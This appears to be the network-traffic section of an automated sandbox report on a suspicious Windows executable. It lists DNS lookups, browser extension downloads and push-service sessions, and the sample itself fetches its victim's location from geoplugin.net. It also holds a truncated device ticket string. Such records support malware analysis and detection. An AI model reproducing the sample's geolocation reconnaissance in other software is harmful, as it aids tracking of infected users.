                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.219557047 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.219594002 CET56123443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.222477913 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.222496986 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.222508907 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.222548008 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.222560883 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.222635984 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.222649097 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.222727060 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.222743988 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.222771883 CET56123443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.222790003 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.225567102 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.225625038 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.225636959 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.225780010 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.225802898 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.225816011 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.225826979 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:29.225838900 CET4435612323.209.72.7192.168.2.6
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Jan 5, 2025 08:39:03.094419956 CET | 192.168.2.6 | 1.1.1.1 | 0x41a6 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 08:39:10.745419979 CET | 192.168.2.6 | 1.1.1.1 | 0x1d08 | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 08:39:10.745877981 CET | 192.168.2.6 | 1.1.1.1 | 0xd3b4 | Standard query (0) | clients2.googleusercontent.com | 65 | IN (0x0001) | false |
| Jan 5, 2025 08:39:17.521956921 CET | 192.168.2.6 | 1.1.1.1 | 0x6b7e | Standard query (0) | ntp.msn.com | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 08:39:17.522469997 CET | 192.168.2.6 | 1.1.1.1 | 0x6135 | Standard query (0) | ntp.msn.com | 65 | IN (0x0001) | false |
| Jan 5, 2025 08:39:18.635132074 CET | 192.168.2.6 | 1.1.1.1 | 0xa893 | Standard query (0) | bzib.nelreports.net | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 08:39:18.635308027 CET | 192.168.2.6 | 1.1.1.1 | 0xfbe0 | Standard query (0) | bzib.nelreports.net | 65 | IN (0x0001) | false |
| Jan 5, 2025 08:39:20.631700993 CET | 192.168.2.6 | 1.1.1.1 | 0x222f | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 08:39:20.631850958 CET | 192.168.2.6 | 1.1.1.1 | 0xd58c | Standard query (0) | clients2.googleusercontent.com | 65 | IN (0x0001) | false |
| Jan 5, 2025 08:39:22.416404009 CET | 192.168.2.6 | 1.1.1.1 | 0xd451 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 08:39:22.416938066 CET | 192.168.2.6 | 1.1.1.1 | 0x4cfd | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false |
| Jan 5, 2025 08:39:22.417450905 CET | 192.168.2.6 | 1.1.1.1 | 0x1499 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 08:39:22.417597055 CET | 192.168.2.6 | 1.1.1.1 | 0x12ea | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false |
| Jan 5, 2025 08:39:22.430783987 CET | 192.168.2.6 | 1.1.1.1 | 0x7d80 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 08:39:22.431101084 CET | 192.168.2.6 | 1.1.1.1 | 0x925a | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Jan 5, 2025 08:39:03.103199005 CET | 1.1.1.1 | 192.168.2.6 | 0x41a6 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 08:39:10.752696037 CET | 1.1.1.1 | 192.168.2.6 | 0x1d08 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 5, 2025 08:39:10.752696037 CET | 1.1.1.1 | 192.168.2.6 | 0x1d08 | No error (0) | googlehosted.l.googleusercontent.com | | 142.250.185.129 | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 08:39:10.753057003 CET | 1.1.1.1 | 192.168.2.6 | 0xd3b4 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 5, 2025 08:39:17.528805971 CET | 1.1.1.1 | 192.168.2.6 | 0x6b7e | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 5, 2025 08:39:17.529534101 CET | 1.1.1.1 | 192.168.2.6 | 0x6135 | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 5, 2025 08:39:17.529737949 CET | 1.1.1.1 | 192.168.2.6 | 0x7ee | No error (0) | svc.ha-teams.office.com | svc.ms-acdc-teams.office.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 5, 2025 08:39:17.529737949 CET | 1.1.1.1 | 192.168.2.6 | 0x7ee | No error (0) | svc.ms-acdc-teams.office.com | | 52.123.243.81 | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 08:39:17.529737949 CET | 1.1.1.1 | 192.168.2.6 | 0x7ee | No error (0) | svc.ms-acdc-teams.office.com | | 52.123.243.85 | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 08:39:17.529737949 CET | 1.1.1.1 | 192.168.2.6 | 0x7ee | No error (0) | svc.ms-acdc-teams.office.com | | 52.123.243.70 | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 08:39:17.529737949 CET | 1.1.1.1 | 192.168.2.6 | 0x7ee | No error (0) | svc.ms-acdc-teams.office.com | | 52.123.224.72 | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 08:39:17.790090084 CET | 1.1.1.1 | 192.168.2.6 | 0x5215 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 5, 2025 08:39:17.790136099 CET | 1.1.1.1 | 192.168.2.6 | 0x567a | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 5, 2025 08:39:17.790136099 CET | 1.1.1.1 | 192.168.2.6 | 0x567a | No error (0) | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | 94.245.104.56 | A (IP address) | IN (0x0001) | false |
| Jan 5, 2025 08:39:18.642678022 CET | 1.1.1.1 | 192.168.2.6 | 0xfbe0 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false |
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:18.643285036 CET1.1.1.1192.168.2.60xa893No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:20.638356924 CET1.1.1.1192.168.2.60x222fNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:20.638356924 CET1.1.1.1192.168.2.60x222fNo error (0)googlehosted.l.googleusercontent.com142.250.185.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:20.639090061 CET1.1.1.1192.168.2.60xd58cNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.423577070 CET1.1.1.1192.168.2.60xd451No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.423577070 CET1.1.1.1192.168.2.60xd451No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.428286076 CET1.1.1.1192.168.2.60x12eaNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.428302050 CET1.1.1.1192.168.2.60x4cfdNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.428312063 CET1.1.1.1192.168.2.60x1499No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.428312063 CET1.1.1.1192.168.2.60x1499No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.438819885 CET1.1.1.1192.168.2.60x7d80No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.438819885 CET1.1.1.1192.168.2.60x7d80No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:22.438851118 CET1.1.1.1192.168.2.60x925aNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                            • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                                            • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                            • https:
                                                                                                                                                                                                                                                                                                                              • assets.msn.com
                                                                                                                                                                                                                                                                                                                            • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49712 | 178.237.33.50 | 80 | 1220 | C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
Jan 5, 2025 08:39:03.113303900 CET | 71 | OUT | GET /json.gp HTTP/1.1
                                                                                                                                                                                                                                                                                                                            Host: geoplugin.net
                                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
Jan 5, 2025 08:39:03.736361980 CET | 1171 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                            date: Sun, 05 Jan 2025 07:39:03 GMT
                                                                                                                                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                                                                                                                                            content-length: 963
                                                                                                                                                                                                                                                                                                                            content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                            cache-control: public, max-age=300
                                                                                                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                            Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port
0 | 192.168.2.6 | 49713 | 40.113.110.67 | 443
Timestamp | Bytes transferred | Direction | Data
2025-01-05 07:39:05 UTC | 71 | OUT
                                                                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: dXgneDW/0Eyg3wRm.1Context: 567cbe66499d160f
2025-01-05 07:39:05 UTC | 249 | OUT
                                                                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-05 07:39:05 UTC | 1084 | OUT
                                                                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: dXgneDW/0Eyg3wRm.2Context: 567cbe66499d160f<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZwTarY3TBO1Ifufl5Y1cPkGP68tRr/lAtoh1ada+X6nZRL7k3WxBwRtjhm01OpHnHA1LsFSFecTgBfXrxAV2X6vxrGzF/lXqobF5ffDpkrPis
2025-01-05 07:39:05 UTC | 218 | OUT
                                                                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: dXgneDW/0Eyg3wRm.3Context: 567cbe66499d160f<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-05 07:39:05 UTC | 14 | IN
                                                                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
2025-01-05 07:39:05 UTC | 58 | IN
                                                                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: WFaRXbrOpEWucy2N2SxMhg.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49728 | 142.250.185.129 | 443 | 3060 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 07:39:11 UTC | 565 | OUT | GET /crx/blobs/AW50ZFsblKnSZ4Cokd_6ezff90SqESnzsDEP0_aWj8PLQyaNmulL_TFAO6OaDn6E5KUtzAPUWysfE9UxhZGBEHCFOUAFecownXTgsAqMLybJ_4b5zhdpH_xwtOXPc5Q3MqgAxlKa5U4FuWWuIm1PKcKfveKWVE_LlpSM/EFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ_24_12_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                                            Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
2025-01-05 07:39:11 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                            Content-Length: 1993285
                                                                                                                                                                                                                                                                                                                            X-GUploader-UploadID: AFiumC5uV43Ac62GeM-9Po4zo9ih6zLUikkgL4uCjNkl8uKkMCiUC0J695d6fAofNMR_eS2M
                                                                                                                                                                                                                                                                                                                            X-Goog-Hash: crc32c=vQB/UA==
                                                                                                                                                                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 06:34:09 GMT
                                                                                                                                                                                                                                                                                                                            Expires: Mon, 05 Jan 2026 06:34:09 GMT
                                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                                            Age: 3902
                                                                                                                                                                                                                                                                                                                            Last-Modified: Thu, 05 Dec 2024 12:57:45 GMT
                                                                                                                                                                                                                                                                                                                            ETag: cf3166d4_ed450d15_095c4c28_d113f6ea_1c2fe6de
                                                                                                                                                                                                                                                                                                                            Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
2 | 192.168.2.6 | 49747 | 40.113.110.67 | 443

Timestamp | Bytes transferred | Direction | Data
2025-01-05 07:39:13 UTC | 71 | OUT
CNT 1 CON 305
MS-CV: fFsDp7k+pEmaulQ/.1
Context: f85d1037b57223bf

2025-01-05 07:39:13 UTC | 249 | OUT
<connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>

2025-01-05 07:39:13 UTC | 1084 | OUT
ATH 2 CON\DEVICE 1061
MS-CV: fFsDp7k+pEmaulQ/.2
Context: f85d1037b57223bf
<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZwTarY3TBO1Ifufl5Y1cPkGP68tRr/lAtoh1ada+X6nZRL7k3WxBwRtjhm01OpHnHA1LsFSFecTgBfXrxAV2X6vxrGzF/lXqobF5ffDpkrPis

2025-01-05 07:39:13 UTC | 218 | OUT
BND 3 CON\WNS 0 197
MS-CV: fFsDp7k+pEmaulQ/.3
Context: f85d1037b57223bf
<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>

2025-01-05 07:39:13 UTC | 14 | IN
202 1 CON 58

2025-01-05 07:39:13 UTC | 58 | IN
MS-CV: oKBL+W6p+kuVn8LgcRd1PQ.0
Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49811 | 142.250.185.225 | 443 | 7232 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-05 07:39:21 UTC | 594 | OUT
GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
Host: clients2.googleusercontent.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8

2025-01-05 07:39:21 UTC | 563 | IN
HTTP/1.1 200 OK
X-GUploader-UploadID: AFiumC4E3I2kdZqohL83nbJieWzIEj20sI6weMzR1-bygi2mdWswYx6gwn0PUdXtQwaS5IyS
Accept-Ranges: bytes
Content-Length: 154477
X-Goog-Hash: crc32c=F5qq4g==
Server: UploadServer
Date: Sat, 04 Jan 2025 15:58:13 GMT
                                                                                                                                                                                                                                                                                                                            Expires: Sun, 04 Jan 2026 15:58:13 GMT
                                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                                            Age: 56468
                                                                                                                                                                                                                                                                                                                            Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                                                            ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                                                            Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49820 | 162.159.61.3 | 443 | 7232 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 07:39:22 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
2025-01-05 07:39:22 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 07:39:22 GMT
                                                                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                                                                            CF-RAY: 8fd1d06c7c517283-EWR
                                                                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49821 | 172.64.41.3 | 443 | 7232 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 07:39:22 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
2025-01-05 07:39:22 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2025-01-05 07:39:23 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Sun, 05 Jan 2025 07:39:22 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8fd1d06c88c5c34e-EWR
alt-svc: h3=":443"; ma=86400
2025-01-05 07:39:23 UTC | 468 | IN | Data Ascii: wwwgstaticcomP#)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49822 | 172.64.41.3 | 443 | 7232 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-05 07:39:22 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2025-01-05 07:39:22 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2025-01-05 07:39:23 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Sun, 05 Jan 2025 07:39:23 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8fd1d06cc850425d-EWR
alt-svc: h3=":443"; ma=86400
2025-01-05 07:39:23 UTC | 468 | IN | Data Ascii: wwwgstaticcom% c)


Session ID | Source IP | Source Port | Destination IP | Destination Port
7 | 192.168.2.6 | 49853 | 40.113.110.67 | 443

Timestamp | Bytes transferred | Direction | Data
2025-01-05 07:39:26 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: TYjg/UCZVkimhPac.1Context: 3a9d158d79335212
2025-01-05 07:39:26 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-05 07:39:26 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: TYjg/UCZVkimhPac.2Context: 3a9d158d79335212<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZwTarY3TBO1Ifufl5Y1cPkGP68tRr/lAtoh1ada+X6nZRL7k3WxBwRtjhm01OpHnHA1LsFSFecTgBfXrxAV2X6vxrGzF/lXqobF5ffDpkrPis
2025-01-05 07:39:26 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: TYjg/UCZVkimhPac.3Context: 3a9d158d79335212<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-05 07:39:26 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2025-01-05 07:39:26 UTC | 58 | IN | Data Ascii: MS-CV: u3uF0uHsEUi8aXyENMXCqA.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49867 | 23.209.72.7 | 443 | 7232 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-05 07:39:26 UTC | 627 | OUT | GET /bundles/v1/edgeChromium/latest/vendors.b4742062efdd1e38bfac.js HTTP/1.1
Host: assets.msn.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
Origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-05 07:39:26 UTC | 1238 | IN | HTTP/1.1 200 OK
Content-Type: application/javascript
Content-MD5: OvDHew0ZSmhxFV5Y7hCEsQ==
                                                                                                                                                                                                                                                                                                                            Last-Modified: Sat, 21 Dec 2024 00:40:22 GMT
                                                                                                                                                                                                                                                                                                                            ETag: 0x8DD21580D62BC01
                                                                                                                                                                                                                                                                                                                            Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                            x-ms-request-id: fd00acba-001e-0066-20bc-5b153f000000
                                                                                                                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 07:39:26 GMT
                                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                                            Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=86400
